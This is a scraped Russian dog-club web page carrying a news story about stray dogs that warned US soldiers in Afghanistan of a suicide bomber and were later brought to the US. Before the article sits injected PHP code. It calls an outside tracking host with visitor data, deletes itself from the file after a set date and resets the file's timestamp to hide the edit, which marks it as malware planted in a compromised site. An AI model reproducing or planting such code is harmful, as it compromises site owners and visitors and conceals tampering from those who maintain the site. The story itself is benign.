check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456755828){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); } Как бродячие собаки спасли солдат в Афганистане (США)
 

РКФ Новый век

Мы в ответе за тех, кого приручили.

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта
Home Интересные новости Как бродячие собаки спасли солдат в Афганистане (США)

Как бродячие собаки спасли солдат в Афганистане (США)

E-mail Печать PDF
>Американец Крис Дьюк проходил службу в Афганистане. Однажды накормил трёх бездомных собак и поиграл с ними. Завязалась дружба с животными, которых солдат назвал: Саша, Руфус и Таргет.

«Эта троица помогала солдатам уйти от реальности. Знаете, это чувство, когда ты тоскуешь по дому», — рассказал Крис в интервью изданию CBS.

Однажды ночью военнослужащие проснулись от лая собак. На военную базу пробрался подрывник-смертник и пытался совершить теракт. Животные спугнули его, и смертник подорвался сам. Пострадали только собаки, отведя беду от 50 военнослужащих.

Саша от ранений погибла. Руфус и Таргет смогли восстановиться.

«Абсолютно уверен, если бы не они, меня бы уже не было на этом свете», — говорит Крис в интервью.

Срок службы в Афганистане для Криса закончился, и он отправился домой. Один солдат согласился присматривать за животными. Но он должен был вскоре оттуда уехать. Поэтому Крис стал думать, как забрать собак.

Военнослужащий узнал о существовании организации Hope for the Warriors, которая помогает солдатам, вернувшимся из горячих точек. Мужчина обратился к специалистам с просьбой перевезти собак из Афганистана в США.

«Это значило для него очень много. Поэтому мы постарались сделать всё, чтобы исполнить его желание», — сказал Робин Келлехер, президент Hope for the Warriors.

Организация принялась готовить документы для перевозки собак, сделала животным и выполнила ряд других требований. И спустя четыре месяца Крис вновь встретился с Руфусом уже у себя на родине. Таргет же отправился жить к другому солдату в Аризону.




Источник http://daylapu.ru/news.php?ngod=2018&news=20
 

Добавить комментарий


Защитный код
Обновить

Пользовательский поиск



Случайное изображение.

 2006  036.jpg

Реклама


Похожие материалы